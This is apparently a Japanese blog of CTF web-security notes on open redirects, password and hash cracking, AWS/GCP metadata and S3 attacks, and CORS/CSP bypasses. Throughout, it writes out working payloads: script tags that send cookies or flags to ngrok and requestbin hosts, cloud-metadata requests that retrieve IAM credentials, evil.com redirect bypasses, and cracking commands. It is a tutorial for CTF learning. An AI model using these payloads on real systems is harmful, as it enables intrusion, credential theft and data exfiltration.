2021-12-25

CTFのWebセキュリティにおけるオープンリダイレクトまとめ

Security

この記事はCTFのWebセキュリティ Advent Calendar 2021の24日目の記事です。

本まとめはWebセキュリティで共通して使えますが、セキュリティコンテスト（CTF）で使うためのまとめです。
悪用しないこと。勝手に普通のサーバで試行すると犯罪です。

オープンリダイレクト
- リダイレクト先として任意のURLが使えてしまう問題
- 何が悪いのか？という気持ちが分からなくもないが、利用用途を見てみるとつぶすべきであると分かる
url=http://example.com/としなくてもurl=//example.comでもOK
/を//にすると発生する
- #297803 [crm.unikrn.com] Open Redirect
  - curl http://crm.unikrn.com//example.com/ -L -vがpayload
  - -Lはリダイレクトもしてくれる
  - -vはverbose
- #929633 Open Redirect on [blog.wavecell.com]
febinrev_👨‍💻💻🔭🔭さんはTwitterを使っています「Some OpenRedirect bypasses: 1. Use "@" symbol : https://t.co/NR0ou3BeUy 2. Register a subdomain :? redir=https://t.co/4jkkQeZMap 3. Use ftp : ? redir=ftp://evil.com:1337/ 4. If http didn't work, try https. #bugbounty #bugbountytips #bugbountytip #infosec #cybersecurity」 / Twitter
- 1. Use "@" symbol : http://target1.com/?redir=http://target1.com@evil.com
- 1. Register a subdomain :? redir=https://target1.com.evil.com
- 1. Use ftp : ? redir=ftp://evil.com:1337/
- 1. If http didn't work, try https.
Open-redirection leads to a bounty | by Pratik Dabhi | InfoSec Write-ups
- dest, redirect, uri, path, continue, url, window, to, out, view, dir, show, navigation, Open, url, file, val, validate, domain, callback, return, page, feed, host, port, next, data, reference, site, html
- redacted.com///evil-site.comみたいに///でリダイレクトできた
- open redirectからSSRFにつながる場合もあるっぽい
  - リダイレクト時に認証情報を入れてくれる？

#437142 Instant open redirect on Live preview WEB Ide opening

  - `window.open("https://evil.com","_top");`とすれば、iframeの親を書き換えられることを利用したオープンリダイレクト

ホストを書き換えてしまうリダイレクト
- 'http://{HOST}' + GET['redirect']みたいにリダイレクト先を設定している場合、GET['redirect']に@evil.example.comを入れると、ホスト名を任意のものに書き換えることができる
  - 好きなサイトに誘導できる（好きにjsコードが動かせる）
  - writeup/web-your-note.md at master · x-vespiary/writeup · GitHub
ホワイトリスト検査をバイパス
- #108113 Bypassing callback_url validation on Digits
  - ?をうまく使ってホワイトリスト検査をバイパス
- #763058 through %09 Character the attacker is able to steal Github Token [ Account Takeover ]
  - タブでバイパス
- 例えばwww.targetweb.comで検証していたらwww.targetweb.attackersite.comみたいにする
uri=°/https://evil.com
リダイレクトURLにtokenとかが含まれている場合にreferrerから情報を抜き出せるかも
- apacheだと後ろが勝って、1つにまとめられるらしい
/が無くてもリダイレクトしたりする location.href="http:example.com"
http://をhttp:\にしても使えたりする
記事
- Bug Bounty Tips #6 - InfosecMatter
  - ツールを使ってオープンリダイレクトを探す
- The real impact of an Open Redirect vulnerability | Detectify Blog
  - 包括的な記事

OpenRedirectを攻撃につなげるには

javascript:alert(1)
単にフィッシングとして使えると指摘してもいい
OAuthとつなげることでAccount Takeoverが狙えるかも
- OAuthのredirect_uriはホスト名のみで検証されている場合、Open Redirectを踏み台にしてトークンを抜き出せるかも
- codeが抜ければ、攻撃者はアプリケーションに代わってFacebookアカウントにアクセスできるようになる（どうだろう）
SSRFでドメイン検証がある場合にbypassできるかも
CSRF対策としてリファラーチェックしてる場合は、bypassできるかも

2021-12-23

CTFのWebセキュリティにおけるPassword Cracking, ハッシュ, 暗号化

Security

この記事はCTFのWebセキュリティ Advent Calendar 2021の23日目の記事です。

パスワードクラック

推測で入れてみる
- 本当に適当に入れてみる。CTFでは推測でこんなユーザーパスがあるのでは？で入れると通ったりする
- guest:guest user:password admin:admin
初期ユーザーパスワードで入れてみる
- phpmyadmin
  - root:が初期値なので、変更しないとこれでログイン可能。ユーザー名がrootでパスワードが空白
- ihebski/DefaultCreds-cheat-sheet: One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password 🛡️
  - デフォルトクレデンシャルがまとまってる
辞書攻撃
- パスワードはみなよくある文字列を使ってしまう傾向がある
  - rockyou.txt
    - CTFではとりあえずこれ使っておけばいい
  - GitHub - danielmiessler/SecLists: SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
    - SecListsもよく使われる。
    - gobusterでDiscovery/Web-Content/を使うのもいい選択
- よく使われるパスワードについて辞書を用意しておき、かたっぱしから試行すると成功する場合がある
- https://wiki.skullsecurity.org/Passwords
  - ここで紹介されてるrockyou.txtがよく使われる。
  - なお、14,341,564（15 millionある）
  - 手元での解析で主に使用される
- https://github.com/rootphantomer/Blasting_dictionary/blob/master/%E5%B8%B8%E7%94%A8%E5%AF%86%E7%A0%81.txt
  - Webサイトの辞書攻撃で使われててた
  - burpでやるとき
    1. Intruderに送る
    2. Positionsで入れ替えたい部分を$pass$とする
    3. PayloadsでSimple listにして、Load...でファイル読み込む（tools/webpass.txt)
    4. Start attackする
    5. Lengthが異なるものが大体答え
パスワードのより深い推測
- 得られた情報からパスワードリストを作成してそれを使って試行する
  - OSINTで使いそうなワードを探して推測する
- 誕生日などで組合せリストを用意して試す
総当たり（ブルートフォース）、リバースブルートフォース
- IDを固定してパスワードを総当たりすると、ブルートフォース
- PASSを固定してIDを総当たりすると、リバースブルートフォース
  - ログインロックはID単位でやってることが多いから、ログインロックを回避可能（なるほど）
パスワードスプレイ攻撃
- 基本的にはリバースブルートフォールと一緒であるが、IDを順番に変えていって最後まで行ったら、パスワードを別のありそうな値に変えてIDを再度全探索していく
パスワードリスト攻撃
- 流出したID・パスワードを使ってログイン試行をすること、リスト型攻撃とも書かれたりする
- 【セキュリティニュース】LINEにPWリスト攻撃 - 2段階認証未適用の問合フォームが標的に（1ページ目 / 全1ページ）：Security NEXT
  - 2FAはすべての部分に採用しないと、弱い所がこのように疲れる。

ハッシュ値の原文の特定・署名の秘密鍵の特定

どのハッシュ関数を使ったハッシュ値か
- hash-identifierを使って特定するのがいい
- jobertabma/transformations
  - 原文とハッシュ値が分かっていれば、ハッシュ化関数を特定可能
- Hash Type Identifier - Identify unknown hashes
- Hash Analyzer - TunnelsUP
- Online Free Hash Identification identifier: find 250+ algorithms | Online Hash Crack
  - 種類数が多い
ハッシュ値をもとに戻す
- crackstation
  - ここに通せば出てくるかも
- https://hashes.com/en/decrypt/hash
  - 一気に戻せる
- https://sckull.github.io/posts/hashes/#2-sha1
辞書攻撃・総当たり

ツール

pythonでゴリゴリ書いてもいいが、どうしても遅いのでクラッカーを積極的に使用しよう。

hashcat

パスワードクラッカー、早い。全探索でcrackするときは、pythonとか使わずにこっち使おう。
./hashcat.exe -m 3200 hash.txt ../dic/rockyou.txt
- 辞書攻撃するときこんな感じ
hashcatを使って変形辞書を作ることもできる
1. ruleというファイル名で変形前の辞書を保存する
2. hashcat.exe -r rules/best64.rule --stdout rule > dic.txtで変形辞書を作成
ハッシュ関数を変えたいときは-mで変える。
- https://hashcat.net/wiki/doku.php?id=hashcat
- ここに対応表が書いてあるので、md5(md5(pass))であれば-m 2600のように指定する。
- 使用済み
  - 3200 bcrypt $2*$, Blowfish (Unix)
  - 100 SHA1
  - 1400 SHA2-256
  - 900 MD4
  - 0 MD5
  - 2600 md5(md5($pass))
  - 4400 md5(sha1($pass))
  - 1000 NTLM
  - 160 HMAC-SHA1 (key = $salt)
    - hash.txtにhash:saltとすればいい
  - 1800 sha512crypt $6$, SHA512 (Unix)
  - 16500 JWT (JSON Web Token)
    - hash.txtにJWTを直に置けばいい
hashcatでshadowファイルを解析する例
- DawgCTF 2021 Writeups – rainbowpigeon
ハッシュについて
- bcrypt - Wikipedia
  - $1$: MD5ベースの暗号('md5crypt')
  - $2$: Blowfishベースの暗号 ('bcrypt')
  - $sha1$: SHA-1ベースの暗号 ('sha1crypt')
  - $5$: SHA-256ベースの暗号 ('sha256crypt')
  - $6$: SHA-512ベースの暗号 ('sha512crypt')
エラーハンドリング
- Initializing backend runtime for device #1...となっている場合は--forceで待てば動くようになるかも
  - これでハングしてる場合は動いてない
原文がアラビア語の場合のクラック
- Bitcrack's Bl0g: Cracking Hashes with Other Language Character Sets

John The Ripper

パスワードの総合的なクラックツール。john --wordlist /usr/share/wordlists/rockyou.txt [hashpath]
JWTの署名もクラック可能
- https://security.stackexchange.com/questions/134200/cracking-a-jwt-signature
Dockerで使うには
- docker run -it -v d:\root\docker\jacktheripper:/root/ adamoss/john-the-ripper --wordlist /root/rockyou.txt /root/cracked.txt
パスワード解析終えたら別コマンドでしか結果取得できないので注意
- $ john --show users.txt実行コマンドに--showを入れるだけ
フォーマット指定について
- フォーマットを指定しなくても大丈夫だが、最初に大量にワーニングが出てこれじゃないみたいな提案をしてくれる。
- 積極的に指定しないと駄目な場合も多い
- フォーマット対応はjohnよりhashcatの方が多い
.htpasswdのパスワード解析 admin:$apr1$1U8G15kK$tr9xPqBn68moYoH4atbg20 渡すだけでOK
shadowのパスワード解析 $ john users.txt --wordlist=dic.txt
private keyで要求されるパスワードを総当りで解析するには
1. ssh2johnを使って、ハッシュ値に変換する（id_rsaを持ってくる）
2. John The Ripperで解析 john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
3. sshで使う $ ssh -i [prikey] [user]@[ip]

圧縮ファイルパスワードクラック

ctf-tools/John/run at master · truongkma/ctf-tools · GitHub
- ここにたくさん*2john.pyがある
zip
1. zip2john [zipfile] > ziphash.txtでハッシュを抜き出す
2. john --wordlist=/usr/share/dirb/wordlists/rockyou.txt ziphash.txtみたいに解析
7z
1. 7z2john ./chicken.7z > chicken.hashでハッシュを抜き出す
2. john chicken.hash --wordlist=/usr/share/dirb/wordlists/rockyou.txt --format=7z-openclみたいに解析
PGP鍵（private key）
1. gpg2john [pgp key] > hash.txt
2. john hash.txt --wordlist=/usr/share/dirb/wordlists/rockyou.txtみたいに解析
3. gpg --import [gpg key (.asc)]
4. gpg --decrypt [gpg file]
jwt (HS256)
1. jwtをそのままhash.txtとして保存
2. john hash.txt
johnは.john/john.potにクラックパスワードがキャッシュされている

Zip

既知平文攻撃

暗号化zipの中に平文がわかっているファイルがあれば、効率的に解析ができる
1. 平文がわかっているファイルを含めて、非暗号zipファイルを作る
2. zipファイルの圧縮環境の違いでうまく行かない場合があるので、その場合は7za L -sltで確認可能
3. pkcrackでクラックする pkcrack -C ./with_password.zip -c mod_logo.jpg -P /tmp/mod_logo.zip -p mod_logo.jpg -d ./dec.zip
4. -C [暗号化されたzipファイル]
5. -c [暗号化されたzipファイルの中で平文がわかるファイル]
6. -P [平文のファイルが入っている暗号化されていないzip] ←これはMUSTじゃない
7. -p [平文のファイル]
8. -d [出力先（復号したzipファイルの名前）]
@Nperairさんのツイート
- zipの標準の暗号化がゴミで、ファイルに12byteの既知の平文があれば既知平文攻撃で中身が読める
- ファイルのフォーマットの都合上先頭12byteくらいはほぼ推測できてしまう
7zipであらかじめ開いてサイズを確認して、既知平文として正しいものかどうかを確認する
DCTF-writeups/CompanyLeak.md at main · yulyachert/DCTF-writeups · GitHub
- bkcrackというツールでもやれる

AES圧縮のzip

zipファイルの新しいフォーマットではAES暗号化とかが使える
- unzipで解凍をneed PK compat.みたいに出てきたら、古い可能性がある
- そういう場合は7za e [filepath]とすると行える
pythonならpyzipperを使えばいい
crack例
- UMDCTF SomeZips

johnとhashcat

ctf/2021/dawg/forensics/photo_album at master · ryan-cd/ctf
- 面白いやり方をしているzip2john encrypted.zip > pass_hash.txtとするとpkzip2という文字列を含むハッシュが得られたので、hashcatの 17200 | PKZIP (Compressed) | Archives 17220 | PKZIP (Compressed Multi-File) | Archives 17225 | PKZIP (Mixed Multi-File) | Archives 17230 | PKZIP (Mixed Multi-File Checksum-Only) | Archives 17210 | PKZIP (Uncompressed) | Archives 20500 | PKZIP Master Key | Archives 20510 | PKZIP Master Key (6 byte optimization) | Archives この一覧から17220を使って$ hashcat.exe -m 17220 -a 3 -1 ?l?d ?1?1?1?1?1?1?1?1 hash.txtで総当たりすると見つかる
- 上と似ているが動かなかった。だが、下なら動いた
  - zip2john [file] | cut -d ':' -f 2 > hash.txtとしてhashcat -a 0 -m 13600 hash.txt --show

2021-12-23

CTFのWebセキュリティにおけるCloud問題（AWS, GCP）

Security

この記事はCTFのWebセキュリティ Advent Calendar 2021の22日目の記事です。

大前提「責任共有モデル」
- アプリケーション（利用者）側とプラットフォーム（クラウド）側での責任の境目
- これを意識して、アプリケーション側での対策を埋めていく
Cloud Based Storage Misconfigurations -> Critical Bounties | by Mikey | Apr, 2021 | Medium
- 全般的なバグバウンティwriteup
  - Public Buckets by GrayhatWarfare
    - 丸見えになっているサイトが一覧で見られる

AWS系

AWSエクスプロイト/ペンテストツール
- GitHub - RhinoSecurityLabs/pacu: The AWS exploitation framework, designed for testing the security of Amazon Web Services environments.
  - 日本語資料：PacuとGuardDuty - Qiita
  - AWS x HackerOneのCTFやってみた(writeup) #hacker101 | DevelopersIO
http://*.s3.amazonaws.com/を開いてみてディレクトリリスティングされたら脆弱
- aws s3 cp proof.txt s3://[BUCKET_NAME] — no-sign-requestでファイルを置いてPoCできる
aws-cliを使うのがお手軽。
テスター
- Endgame
AWS 診断を事例としたクラウドセキュリティ。サーバーレス環境の不備や見落としがちな Cognito の穴による危険性 - Flatt Security Blog
IMSv2
- 以下手順で情報が抜ける
- curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"でTOKEN取得
- curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
  - これでdirectoryが抜ける？
- curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/iam/security-credentials/S3Role
  - これで認証情報が抜ける
- ~/.aws/credentialsに手順3から情報を抜き出して配置
- aws s3コマンドが認証下で使える
  - aws s3 ls
  - aws s3 cp s3://filepath outpath
    - aws s3 cp s3://secretdocs/leviathan.txt flag.txt
- ref: Tenable CTF: Hacking Toolz | Debugmen
SSRFで狙うエンドポイント（全部にhttp://169.254.169.254/latestがつく）
- /dynamic/instance-identity/document リージョン情報とかアカウントIDとか抜ける
- /meta-data/ でメタデータをとってこれる
  - /meta-data/iam/security-credentials/ クレデンシャルの一覧がとれる
- /user-data
インシデント/バグバウンティ
- Amazon S3 バケットの設定ミスによる大規模な個人情報の流出
- IAMのアカウント設定の不備による不正侵入の発生
- Amazon VPCの設定不備による不正侵入の発生
- Escalating SSRF to Accessing all user PII information by aws metadata | by Santosh Kumar Sha (@killmongar1996) | Jun, 2021 | Medium
  - http://169.254.169.254/ 接続確認
  - http://www.owasp.org.1ynrnhl.xip.io/latest/meta-data/iam/security-credentials/Prod [AccessKeyId, SecreatAccessKey, Token]を奪う
  - http://www.owasp.org.1ynrnhl.xip.io/latest/dynamic/instance-identity/document [instanceId, accountId, region]を奪う
- #905641 [OPEN S3 BUCKET] All uploaded files are public.
  - https://s3.amazonaws.com/backend-production-librarybucket-1izigk5lryla9/85abcc94-a7db-4529-b0aa-826e3026c8c1/1592856757262_camion2.svgとあったら全部見れちゃうかも
  - $ aws s3 ls backend-production-librarybucket-1izigk5lryla9として応答を見てみる

AWSコマンドについて

aws — AWS CLI 1.20.11 Command Reference
全般的に認証クレデンシャルが必要で、AWSアカウントが必要
もし認証情報が得られたら、aws configureを使って入れて、好きなようにできる
- aws configure
- AWS Access Key ID [None] :でAWS_SECRET_ACCESS_KEYを入れる
- AWS Secret Access Key [None] :でAWS_ACCESS_KEY_IDを入れる
- Default region name [None] : eu-west-1はそれっぽいのを試せるし、urlから漏れてる場合が多い。eu-west-1みたいなのを入れる
- Default output format [None] :は空白で問題ない
aws s3
- aws s3 ls s3://test-bucket
- aws s3 cp test.txt s3://test-bucket コピーする
  - アップロード時に権限を指定してアップロードできたりする aws s3 cp [FILE] s3://[bucket_name] --acl public-read
- aws s3 mv test.txt s3://test-bucket moveする
  - これでAccess Deniedとなってもaws s3 rm XXXでアップロードファイルを指定してみたらforbiddenで帰ってきたら実は上げれてるかも（ほんとか？）
- aws s3 rm s3://test-bucket/test.txt 削除する
- aws s3 cp s3://test-bucket/file.txt ./ awsから持ってくる
aws s3api
- aws s3api list-buckets s3のリストが得られる
- aws s3api get-bucket-tagging --bucket cleaningbucket-cf2be35 タグが見られる
- grants aws s3api get-bucket-acl --bucket test-bucket
- READ aws s3api get-object --bucket test-bucket --key read.txt read.txt
- READ_ACP aws s3api get-object-acl --bucket test-bucket --key read-acp.txt
- WRITE aws s3api put-object --bucket test-bucket --key write.txt --body write.txt
  - ダメ An error occurred (AccessDenied) when calling the PutObject operation: Access Denied
  - OK "ETag": "\"1398e667c7ebaa95284d4efa2987c1c0\""
aws lambda
- aws lambda list-functions
- aws lambda list-tags --resource arn:aws:lambda:eu-west-1:957405373060:function:lambdaThrusters-8697c51
aws ec2
- aws ec2 describe-tags

Amazon S3

bucket-nameっぽいのをもらったら
bucket-nameが分かっていたら
- http://s3.amazonaws.com/wrapper3000みたいにアクセスしてみる
  - Contentsタグとかが正しく出ていれば認証無しで参照可能
  - packageというファイルがあれば、http://s3.amazonaws.com/wrapper3000/packageって感じでDL可能
memo
- google dork "site:s3.amazonaws.com" "target.com"
- GETが許可されていなくてもPUTで何も送らないとGETと同じような感じで取得可能
  - CTFtime.org / Hacky Holidays - Space Race / Enumerating the cloud / Writeup
  - curl -X PUT https://g0341x75tb.execute-api.eu-west-1.amazonaws.com/logs
普通に中身見たいとき
- https://volgactf-wallet.s3-us-west-1.amazonaws.com/locale_abc123.jsってあったら
  - https://volgactf-wallet.s3-us-west-1.amazonaws.comとすれば中身の一覧見られるかも
S3はリージョンが同じなら同じIPになるから、Hostだけ書き換えてやればS3ストレージの参照先を変えることができる
- つまり、CRLFインジェクションでHost名がいじれるならファイルの参照先をうまく変えることができる
- '>">123: VolgaCTF 2021 Quals / Online Wallet, Static Site writeups
使えるコマンド
バケット名を特定する方法
- S3を指していることは分かったが、ドメインが見つからないとき
- ドメインをgoogleで検索して、履歴からバケット名が流出してないか確認
- バケット内のオブジェクトの応答ヘッダーを調べて、バケット名が流出していないか確認
- 何とかしてディレクトリ列挙ができた場合、ファイルのrandom_keyが流出している場合がある
  - このrandom_keyを指定するとリダイレクトで本物の（バケット名込みの）URLが得られる
  - Bug Bounty Reports ExplainedさんはTwitterを使っています「How bad can be an implementation of AWS S3 signed URL? The answer is it can be really bad. Watch my latest video to learn how @fransrosen hacked all files of undisclosed company for a $25,000 bounty. The video is sponsored by @detectify https://t.co/9xkNVgtIl9」 / Twitter
解説
- A deep dive into AWS S3 access controls – taking full control over your assets | Detectify Labs
6種類の脆弱タイプ
- Amazon S3 bucket allows for full anonymous access
- Amazon S3 bucket allows for arbitrary file listing
- Amazon S3 bucket allows for arbitrary file upload and exposure
- Amazon S3 bucket allows for blind uploads
- Amazon S3 bucket allows arbitrary read/writes of objects
- Amazon S3 bucket reveals ACP/ACL
事例 GhostWriter
- Amazon S3の設定ミスを狙う攻撃、"GhostWriter"(大元隆志) - 個人 - Yahoo!ニュース
- 脆弱なS3にマルウェアをおいて、攻撃時にそれを持ってくる
未知のS3を辞書を使って探してくる例
- Playing With s3 — Leaks. Hi Everyone, | by Aswin Thambi Panikulangara | Jul, 2021 | Medium
- fuzzで探す
  - subfinder -d redacted.com > subdomains.txt
  - ffuf -u http://FUZZ.s3.amazonaws.com -w subdomains.txt
- waybackから持ってくる cat subdomains.txt | waybackurls | grep s3.amazonaws

AWS系Chellenge/writeup

AWS S3 CTF Challenges
AWS x HackerOneのCTFやってみた(writeup) #hacker101 | DevelopersIO
wanictf21spring-writeup/web/cf-basic at main · wani-hackase/wanictf21spring-writeup
- 参考になるwriteup
- プロキシ経由ではなく直接つなぎに行けば認証をbypassできるというもの

Google

Google document系からの情報流出

共有URLから情報が漏れるかも
- GitHub - Malfrats/xeuledoc: Fetch information about a public Google document.
  - PoC。これで確認可能

GCP

FireStore
- Firestoreセキュリティルールの基礎と実践 - セキュアな Firebase活用に向けたアプローチを理解する - Flatt Security Blog
firebase
- Firebaseにおけるセキュリティの概要と実践 - Flatt Security Blog
- #1066410 Google API key leaks and security misconfiguration leads Open Redirect Vulnerability
  - 'https://firebasedynamiclinks.googleapis.com/v1/shortLinks?key=AIzaSyAw-SpLHVTIP3IFEIkckCuEmIhnUrY9OrQ';みたいにgoogleapikeyがリークしているかも
Challenges
- Thunder CTF
Writeups
- CTFtime.org / DownUnderCTF / Cookie Clicker
- ctf-writeups/DiceCTF2021/Watermark-as-a-Service at main · tlyrs7314/ctf-writeups · GitHub
  - http://metadata.google.internal/computeMetadata/v1/instance/:
    - Metadata-Flavor: Googleをつけないと見れない？
  - v1beta1の場合は以下も見れる？
    - http://metadata.google.internal/computeMetadata/v1beta1/instance/?recursive=true
    - http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token?alt=json
      - これによりThere is a docker image hosted on Google Cloud at gcr.io/dicegang-waas/waasとアクセストークンが得られるので、取ってきて起動してみる
        
        $ docker login -u oauth2accesstoken -p "<token>" gcr.io
        
        $ docker pull gcr.io/dicegang-waas/waas
        
        $ docker run gcr.io/dicegang-waas/waas

2021-12-22

CTFのWebセキュリティにおけるクライアント側まとめ（CSP, CORS, Web Assembly, PostMessage)

Security

この記事はCTFのWebセキュリティ Advent Calendar 2021の21日目の記事です。

CORS

CORS Misconfiguration

SOPをbypassする機能がCORSであるが、制約を緩くしすぎて情報流出する場合がある
資料
- 3 Ways You Can Exploit CORS Misconfigurations | we45

攻撃サンプル

origin攻撃
- *
- *.target.com
- target.com.evil.com
- eviltarget.com
- null
- evil.com
Exploiting misconfigured wildcard (*) in CORS Headers
- Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
- どんなドメインでも受け入れてしまうので、XSSで読み込んむと内容が得られるので、この設定がなされていて応答に機微な情報が含まれていれば危険
Using XSS to make requests to cross-origin sites
- XSSがあると情報が抜ける
- <script>function%20cors(){var%20xhttp=new%20XMLHttpRequest();xhttp.onreadystatechange=function(){if(this.status==200) alert(this.responseText);document.getElementById("demo").innerHTML=this.responseText}};xhttp.open("GET","https://www.redacted.com/api/return",true);xhttp.withCredentials=true;xhttp.send()}cors();</script>こんな感じに抜いてくればいい
  - Think Outside the Scope: Advanced CORS Exploitation Techniques | by Sandh0t | InfoSec Write-ups
攻撃
- OriginがそのままACAOに反映される Origin: attacker.comでリクエストするとAccess-Control-Allow-Origin: attacker.comとなる
- サブドメインでもOK Origin: attacker.com.evil.com で Access-Control-Allow-Origin: attacker.com.evil.comとか
- wildcardになってる
- null Origin: null
- Verb変えてみる
Advanced CORS Technique
- 2018年に見つかった更なるテクニックがある
- 発祥の地: Advanced CORS Exploitation Techniques – Corben Leo – infosec write-ups and ramblings
  - Safari限定で発現するもの
- 一般には使えない文字を使ってbypassするもの。実際どれくらい脆弱性として認められるんだろう
mitigation
- Authoritative guide to CORS (Cross-Origin Resource Sharing) for REST APIs | Moesif Blog

CSP

CSPの種類について
- script-src-elem <script>alert(1)</script>や<script src="/jquery.js">
- script-src-attr <svg onload="alert(1)">
- base-uri <base href="https://example.com/">
  - 'none'か'self'にしておけばbaseがインジェクションされてもとりあえず大丈夫。追加理由ほとんどないんだしnoneでいいんじゃないかな？
  - none以外だったら、base tag injectionを疑うこと
- connect-src
  - CSP: connect-src - HTTP | MDN
  - 制約対象が多いな。
  - connect-src http: https:;はガバガバ設定
- img-src
推奨設定？
- script-src 'nonce-{random}' 'unsafe-inline' 'unsafe-eval' 'strict-dynamic' https: http:;
- object-src 'none';
- base-uri 'none';
回避テク一覧
- Content Security Bypass Techniques to perform XSS | Medium
- Content Security Policy Level 3におけるXSS対策 - pixiv inside
CSPが複数あれば、最も制約の厳しいものが採用される
- Content-Security-Policy - HTTP | MDN
CSP Evaluator
- このサイトに通して弱点を探るのもいい
CSP: Content Security Policy
- 挿入されたjavascriptの実行を制約することで、XSSが成立しないようにする
- サーバからブラウザへポリシーを伝えることで、そのポリシー以外の実行を制限する
- content-security-policy:を見ると、許可されている操作が書かれているので、許可されてる範囲でバイパスを考える
script-src
- script-src 'self' data:;
  - script-srcのdataスキームが許可されている
  - <script src="data:text/javascript,ここに任意コード">
  - <script src="data:text/javascript,fetch('/csp-one-flag').then(x=>x.text()).then(x=>location='http://requestbin.net/r/1ax2j8w1?q='+escape(x))">
- script-src 'self' ajax.googleapis.com 'unsafe-eval';
  - ajax.googleapis.comが使える。こういった時は外部ライブラリを踏み台にしてバイパスする
  - Angular.js
    - 直後にng-app属性を持ったpタグを入れることで、内部のjsコードを即座に実行してくれる html <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js"></script> <p ng-app>{{constructor.constructor('ここに任意コード')()}}
    - XSS in the AWS Console
      - <input ng-focus=$event.view.alert('XSS')>
- script-src 'self' *.google.com *.gstatic.com;
  - <script src="https://accounts.google.com/o/oauth2/revoke?callback=[jscode]
  - payload: <script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(31337)"></script>
- script-src: strict-dynamic
  - この設定がされていると、正しいnonceを持ったscriptタグ内部で動的に作ったスクリプトは動く
  - よって、scriptタグ内部で動的にスクリプトが作れないかを探す
    - SECCON beginners CTF 2020 web問 writeup - 空地
  - 反射型XSSとDOM-based XSSの合わせ技
- "script-src":"'self' 'unsafe-inline'"
  - インライン JavaScript および CSS を許可します
  - 普通に<script>sendMyDataToEvilDotCom();</script>が許可される
- script-src 'none'
  - scriptタグは全く使えない
- style-src 'self' http://cdn.embedly.com/;
  - CSSを外部からインジェクションできるようになる。この場合は、selfかhttp://cdn.embedly.com/ならCSSを外部から入れれる
  - ctf/2021/dice_ctf/build_a_better_panel at master · qxxxb/ctf · GitHub
    - この問題では特殊でhttp://cdn.embedly.com/にXSS的脆弱性があり、CSSを注入できるようになっていた
- script-src 'nonce-*'
  - CTFtime.org / ångstromCTF 2021 / nomnomnom html This score was set by ${name} <script nonce='${nonce}'>
    - firefoxに限り、上記の様にscriptタグの直前に入力値を入れられる場合にnonceを取り込んだscriptタグを生成できる
      - <script src="data:, location.replace('http://[redacted: 12 chars].ngrok.io/?d=' + document.cookie);"
      - <script src="https://textbin.net/raw/o4tst0cpr6" dummy=\
      - 上記のような不完全なscriptタグを用意することでnonceを取り込める
- script-src 'self'
  - SECCON Beginners CTF 2021【Web】magic 作問者writeup | Hi120kiのメモ
  - サイト自身のドメインからsrcで持ってきたJavaScriptだけ実行する
  - JSONPか、入力をそのまま出力しているような所があれば、そこ経由でJavaScriptを実行可能
default-src 'self'
- サイト管理者が、すべてのコンテンツをサイト自身のドメイン (サブドメインを除く) から取得させたい場合に設定する。自分のドメインからのjsしか受け付けない。
- こういう場合は、jsファイルとかsvgファイルとかをアップロードして、それを指定することで実行させる
- 指定のないもののデフォルト値として動く。
Content Security Policy Level 3におけるXSS対策 - pixiv inside
信頼されたほかのjsコードを経由することでバイパス実行する方法がある
- JSONP csp-evaluator/jsonp.js at master · google/csp-evaluator · GitHub
- Angular csp-evaluator/angular.js at master · google/csp-evaluator · GitHub
  - scriptSrc: ["'self'", "'unsafe-eval'", "https://cdnjs.cloudflare.com/"],となっていれば、 html <script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.1.5/angular.min.js"></script> <p ng-app>{{constructor.constructor('fetch("/alien").then(r=>r.text()).then(t=>location="MY_URL?q="+escape(t.slice(754, 854)))')()}}
- H5SC Minichallenge 3: "Sh*t, it's CSP!" · cure53/XSSChallengeWiki Wiki · GitHub
突破できなかったやつ
- content-security-policy: default-src 'none'; style-src 'nonce-$nonce'; script-src 'nonce-$nonce'
strict-dynamic
- すでに実行を許可されたJavaScriptコードから読み込まれたJavaScriptコードを実行可能にする
- JSONPを実行するために追加しているかもしれない
回避例
- PayPalでDOMPolyglotXSSを簡単に見つける| PortSwigger Research
CSP Policy Injection
- 入力がCSPのポリシーに組み込まれる場合に、設定されていないCSP Policyを追加で設定できる
- 同じポリシーを設定した場合は、Chromeであればエラーとなる
- ; script-src-attr 'unsafe-inline'という感じにインジェクションする
CSP Embedded Enforcement
- とそれを利用したサイドチャネル攻撃
  - https://graneed.hatenablog.com/entry/2021/08/09/115452
  - https://st98.github.io/diary/posts/2020-12-10-pbctf-2020.html#web-443-xsp-3-solves
CSPの影響を受けないもの（ほんとか？）
- <meta http-equiv="refresh" content="0; URL={{遷移先}}> metaタグによる遷移
- <link rel="preload" href="https://webhook.site/…" as="fetch">による読み込み

WebAssembly

ブラウザからWebAssemblyをデバッグする方法

Debugging WebAssembly with modern tools - Chrome Developers
- setup
  1. https://goo.gle/wasm-debugging-extensionをいれる
  2. Chrome DevToolsを開いて、歯車→Experiments→WebAssembly Debugging: Enable DWARF supportを有効にする
  3. 設定を閉じると、リロードしますか？と聞かれるので閉じる
  4. Sourceパネルを開いて適当にブレークすれば出てくる
- 解析例
  - 適当にブレークする
  - Localをみればローカル変数の中身が見れる
  - Moduleの$memoryのbufferを見れば、ポインタ指定されていれば中身が見れる
  - ブレーク中は変数にカーソルを当てると中身が見れる
UTCTF 2020 writeup - Wasm Fans Only - こんとろーるしーこんとろーるぶい

C言語に直すには

参考
- picoCTF2021 [Web Exploitation] writeup - 好奇心の足跡
手順
1. wasm2cでコンパイル
2. ghidraでデコンパイル

解析例

CTFtime.org / UIUCTF 2020 / nookstop 2.0 / Writeup CTFtime.org / UTCTF 2021 / It's wasm time - UTCTF 2020 writeup - Wasm Fans Only - こんとろーるしーこんとろーるぶい - Chrome Developer Toolで動的解析できるみたい - WebAssemblyちょっとやる - バランスを取りたい

PostMessage

PostMessageを使えばiframe間のCrossSite通信が通るので、注意しないといけないという話
hackerone
- $20000 Facebook DOM XSS : Vinoth Kumar
